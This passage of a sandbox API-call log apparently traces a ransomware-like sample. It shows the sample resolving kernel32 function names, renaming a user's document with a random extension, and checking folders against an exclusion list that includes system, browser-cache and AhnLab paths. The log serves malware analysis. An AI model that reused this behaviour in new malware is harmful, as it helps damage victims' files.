returned="CreateHardLinkTransactedA" [0084.340] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0084.340] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0084.340] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0084.340] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0084.340] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0084.340] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0084.340] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0084.341] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0084.341] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0084.341] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0084.341] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0084.341] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0084.341] lstrlenA (lpString="CREATEJOBSET") returned 12 [0084.341] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0084.341] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0084.341] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0084.341] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0084.341] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0084.341] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0084.341] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0084.341] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0084.341] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0084.341] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0084.341] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0084.341] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0084.341] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0084.341] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0084.341] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0084.341] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0084.341] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0084.341] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0084.341] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0084.341] lstrlenA (lpString="CREATEPIPE") returned 10 [0084.341] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0084.341] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0084.341] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0084.341] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0084.341] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0084.341] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0084.341] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0084.341] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0084.341] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0084.341] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0084.341] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0084.341] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0084.341] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0084.342] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0084.342] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0084.342] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0084.342] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0084.342] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0084.342] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0084.342] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0084.342] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0084.342] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0084.342] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0084.342] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0084.342] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0084.342] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0084.342] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0084.342] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0084.342] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0084.342] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0084.342] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0084.342] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0084.342] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0084.342] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0084.342] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0084.342] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0084.342] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0084.342] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0084.342] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0084.342] lstrlenA (lpString="CREATETHREAD") returned 12 [0084.342] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0084.342] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0084.342] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0084.342] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0084.342] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0084.342] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0084.342] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0084.342] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0084.342] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0084.342] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0084.342] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0084.343] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0084.343] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0084.343] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0084.343] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0084.343] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0084.343] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0084.343] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0084.343] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0084.343] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0084.343] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0084.343] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0084.343] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0084.343] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0084.343] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0084.343] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0084.343] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0084.343] lstrlenA (lpString="CTRLROUTINE") returned 11 [0084.343] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0084.343] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0084.343] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0084.343] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0084.343] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0084.343] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0084.343] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0084.343] lstrlenA (lpString="DEBUGBREAK") returned 10 [0084.343] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0084.343] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0084.343] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0084.343] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0084.343] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0084.343] lstrlenA (lpString="DECODEPOINTER") returned 13 [0084.343] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0084.343] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0084.343] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0084.343] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0084.343] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0084.343] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0084.343] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0084.344] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0084.344] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0084.344] lstrlenA (lpString="DELETEATOM") returned 10 [0084.344] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0084.344] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0084.344] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0084.344] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0084.344] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0084.344] lstrlenA (lpString="DELETEFIBER") returned 11 [0084.344] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0084.344] lstrlenA (lpString="DELETEFILEA") returned 11 [0084.344] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0084.344] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0084.344] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0084.344] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0084.344] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0084.344] lstrlenA (lpString="DELETEFILEW") returned 11 [0084.344] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0084.344] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0084.344] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0084.344] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0084.344] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0084.344] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0084.344] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0084.344] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0084.344] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0084.344] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0084.344] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0084.344] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0084.344] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0084.344] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0084.344] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0084.344] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0084.344] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0084.344] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0084.344] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0084.344] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0084.344] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0084.344] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0084.345] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0084.345] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0084.345] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0084.345] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0084.345] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0084.345] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0084.345] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0084.345] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0084.345] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0084.345] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0084.345] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0084.345] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0084.345] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0084.345] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0084.345] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0084.345] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0084.345] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0084.345] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0084.345] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0084.345] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0084.345] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0084.345] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0084.345] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0084.345] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0084.345] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0084.345] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0084.345] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0084.345] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0084.345] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0084.345] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0084.345] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0084.345] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0084.345] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0084.345] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0084.345] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0084.345] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0084.346] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0084.346] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0084.346] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0084.346] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0084.346] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0084.346] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0084.346] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0084.346] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0084.346] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0084.346] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0084.346] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rM7ylqPkY2XjY0bBIgTA.docx") returned 65 [0084.346] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rM7ylqPkY2XjY0bBIgTA.docx.d8kQ") returned 70 [0084.346] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rM7ylqPkY2XjY0bBIgTA.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rm7ylqpky2xjy0bbigta.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rM7ylqPkY2XjY0bBIgTA.docx.d8kQ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rm7ylqpky2xjy0bbigta.docx.d8kq"), dwFlags=0x0) returned 1 [0084.347] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.347] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.347] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.347] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51e76b60, ftCreationTime.dwHighDateTime=0x1d4c81b, ftLastAccessTime.dwLowDateTime=0xbaf1c2b0, ftLastAccessTime.dwHighDateTime=0x1d4d516, ftLastWriteTime.dwLowDateTime=0xbaf1c2b0, ftLastWriteTime.dwHighDateTime=0x1d4d516, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="S3f3UGhxqbgggRUc", cAlternateFileName="S3F3UG~1")) returned 1 [0084.347] lstrcmpW (lpString1="S3f3UGhxqbgggRUc", lpString2=".") returned 1 [0084.347] lstrcmpW (lpString1="S3f3UGhxqbgggRUc", lpString2="..") returned 1 [0084.348] lstrcatW (in: lpString1="S3f3UGhxqbgggRUc", lpString2="\\" | out: lpString1="S3f3UGhxqbgggRUc\\") returned="S3f3UGhxqbgggRUc\\" [0084.348] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="S3f3UGhxqbgggRUc\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\" [0084.348] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\", lpSrch="\\Program Files") returned 0x0 [0084.348] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\", lpSrch=":\\Windows") returned 0x0 [0084.348] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\", lpSrch="\\Games\\") returned 0x0 [0084.348] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\", lpSrch="\\Tor Browser\\") returned 0x0 [0084.348] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\", lpSrch="\\ProgramData\\") returned 0x0 [0084.348] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0084.348] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0084.348] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0084.348] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\", lpSrch="\\All Users") returned 0x0 [0084.348] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\", lpSrch="\\IETldCache\\") returned 0x0 [0084.348] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\", lpSrch="\\Local Settings\\") returned 0x0 [0084.348] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\", lpSrch="\\AppData\\Local") returned 0x0 [0084.348] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\", lpSrch="AhnLab") returned 0x0 [0084.348] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0084.348] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\") returned 57 [0084.348] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0084.348] 